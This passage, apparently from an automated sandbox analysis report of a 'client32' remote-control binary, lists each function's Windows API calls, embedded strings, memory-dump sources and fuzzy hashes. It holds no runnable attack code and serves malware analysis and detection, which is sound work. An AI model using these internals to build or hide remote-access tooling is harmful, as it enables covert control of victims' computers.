                                                                                  • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 11053635
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                  • GetTickCount.KERNEL32 ref: 11053660
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                  • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                    • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                  • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                  • API String ID: 2238969640-1197860701
                                                                                  • Opcode ID: a125caa266158cfd1567ef2fce88b3a409ca474b9ba5f2c652a5a1265fbf28b7
                                                                                  • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                  • Opcode Fuzzy Hash: a125caa266158cfd1567ef2fce88b3a409ca474b9ba5f2c652a5a1265fbf28b7
                                                                                  • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                  Function 11153730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 11153763
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                  • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                  • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                  • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                  • String ID: @Ls
                                                                                  • API String ID: 602542589-4225762999
                                                                                  • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                  • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                  • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                  • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                  Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                  • _memset.LIBCMT ref: 1101F2D8
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                  • _free.LIBCMT ref: 1101F305
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _free.LIBCMT ref: 1101F30E
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                  • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                  • String ID: $0$UndoOwnerDraw
                                                                                  • API String ID: 4094458939-790594647
                                                                                  • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                  • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                  • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                  • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                  Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1106F737
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeavewsprintf
                                                                                  • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                  • API String ID: 3005300677-3496508882
                                                                                  • Opcode ID: c5c9b37cbf4a9744e401d9b2689a4a4194d5dca95882f922ec684c96c689cda2
                                                                                  • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                  • Opcode Fuzzy Hash: c5c9b37cbf4a9744e401d9b2689a4a4194d5dca95882f922ec684c96c689cda2
                                                                                  • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                  Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 1104147B
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • SendMessageTimeoutA.USER32(?,0000004A,0006040E,?,00000002,00002710,?), ref: 11041670
                                                                                  • _free.LIBCMT ref: 11041677
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                  • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                  • API String ID: 1897251511-2352888828
                                                                                  • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                  • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                  • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                  • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                  Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110513F9
                                                                                  • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle__wcstoi64_memset
                                                                                  • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                  • API String ID: 510078033-311296318
                                                                                  • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                  • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                  • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                  • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                  Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                  • API String ID: 536389180-1339850372
                                                                                  • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                  • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                                  • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                                  • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                                  Function 111076E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                  • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                  • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                  • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                  • API String ID: 3891031082-3311166593
                                                                                  • Opcode ID: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                  • Instruction ID: d3321afa8f45acf833dece3f06e7fdc0391082dc92555cffabcd4bc49ffbb5d2
                                                                                  • Opcode Fuzzy Hash: e724e7b83d875102122b1b16448b14bdaea8f0febcc2212ee161bb5a17434397
                                                                                  • Instruction Fuzzy Hash: 6641327AE00A19AFE710DFA4C888F9AFBF4FB05358F014269E89597341D774AC40CB90
                                                                                  Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                  • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                  • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                  • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                    • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                    • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,50D94AA1,?,00000000,00000001), ref: 110D7F8C
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  Strings
                                                                                  • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                  • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                  • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                  • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                  • API String ID: 477284662-4139260718
                                                                                  • Opcode ID: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
                                                                                  • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                  • Opcode Fuzzy Hash: dbd2cdf28a0a0cf71f03d3c226c743d460d308e4e4eed45dc5dc12da83a0402e
                                                                                  • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                                  Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                  • SendMessageA.USER32(00000000,0000004A,0006040E,?), ref: 1103D313
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                  • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
